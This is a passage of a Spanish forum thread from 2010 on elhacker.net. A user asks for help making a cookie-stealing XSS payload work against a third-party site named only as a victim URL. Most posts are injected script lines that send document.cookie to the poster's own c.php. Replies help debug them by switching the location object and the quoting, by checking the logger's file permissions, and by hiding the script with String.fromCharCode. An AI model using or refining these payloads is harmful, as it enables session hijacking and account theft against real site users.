elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  XSS Help!!!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: XSS Help!!!  (Leído 8,260 veces)
[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
XSS Help!!!
« en: 10 Febrero 2010, 17:15 pm »

Encontre un bug de xss en una pagina web al poner  "><scritp>alert(document.cookie)</script> me da la cookie perfectamente pero al hacer esto

"><scritp>window.location="http://mysite.us/c.php?cookie="+document.cookie;</script>

no me caputara la cookie ya intente mandar solo a la web y lo hace perfectamente el problema esta parece que no me concatena el document.cookie alguna ayuda!!!
En línea

tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: XSS Help!!!
« Respuesta #1 en: 10 Febrero 2010, 17:20 pm »

esto va en nivel web... XD
prueba con document.location en lugar de window.location


pD: de javascript no tengo demasiada idea pero es lo k e visto @ google :/


un saludo!
En línea

Colaboraciones:
1 2
[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: XSS Help!!!
« Respuesta #2 en: 10 Febrero 2010, 17:27 pm »

De hecho si pido disculpa no me di cuenta por ponertlo aqui.

"><script>document.location="http://mysite.us/c.php?cookie="+ document.cookie;</script>

ya tambien lo e tratado y nada.
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: XSS Help!!!
« Respuesta #3 en: 10 Febrero 2010, 19:06 pm »

En el primer codigo, no te funko porque pusiste
Código:
"><scritp>....
y es
Código:
"><script>....
xD, ahora en el segundo codigo, intentad ponerlo bajo comillas simples y no dobles
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: XSS Help!!!
« Respuesta #4 en: 10 Febrero 2010, 19:12 pm »

Shell Root

"><script>document.location='http://mysite.us/c.php?cookie='+ document.cookie;</script>

Tampoco funciono!! no me manda al link es como que no concatena la intruccion del javascript es decir al poner esto en address bar

http://url_victima.com/empty_personal.phtml?r="><script>window.location='http://myweb.com/c.php?cookie='+document.cookie;</script>

no me manda a la pagina web del javascript a donde esta el cookie stealer pero si le quito la concatanacion es decir  
URL + document.cookie;

http://url_victima.com/empty_personal.phtml?r="><script>window.location='http://myweb.com/c.php?cookie=';</script>

funciona entoces el problema esta en el + document.cookie; que no me concatena.
« Última modificación: 10 Febrero 2010, 19:22 pm por [{O_o}] » En línea

Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: XSS Help!!!
« Respuesta #5 en: 10 Febrero 2010, 21:24 pm »

que raro  :-\, nose, proba con self.location
En línea

[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: XSS Help!!!
« Respuesta #6 en: 10 Febrero 2010, 21:47 pm »

http://vitima.com/01109417885/empty_personal.phtml?r="><script>selft.location='http://mypage.com/c.php?cookie='+document.cookie;</script>

Nada no funciona y sigue pasando lo mismo si le quito el + document.cookie funciona normal.
En línea

~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: XSS Help!!!
« Respuesta #7 en: 10 Febrero 2010, 22:09 pm »

Haber, muestra lo siguiente:

El codigo php para guardar el archivo de texto con las cookie.
Muestra los permiso del archivo php y los permiso de la carpeta donde esta este.
Muestra una captura aver si el XSS funciona correctamente.
En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: XSS Help!!!
« Respuesta #8 en: 10 Febrero 2010, 22:25 pm »

Ps bueno ya tengo la solución, estaba probando lo y lo solucione con la función String.fromCharCode() de javascript. ok bueno mira.

Primero vamos encodear el codigo javascript a ASCII , que sera este:
Código:
<script>window.location="http://www.google.com";</script>
Ahora sera:
Código:
60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 103, 111, 111, 103, 108, 101, 46, 99, 111, 109, 34, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62

Entonce la XSS quedara asi
Código:
"><script>document.write(String.fromCharCode(
60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 103, 111, 111, 103, 108, 101, 46, 99, 111, 109, 34, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62))</script>

Solo ponerlo en el navegador y te redireccionara a google, puedes usar esta herramienta online para que encodes tu codigo a ASCII:
Herramienta

Saludos espero que funcione.
En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: XSS Help!!!
« Respuesta #9 en: 10 Febrero 2010, 22:38 pm »

Esa parte funciona correctamente la parte que no me funciona es al agregarle el + document.cookie; al javascript voy intentar con el encode.
En línea

Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines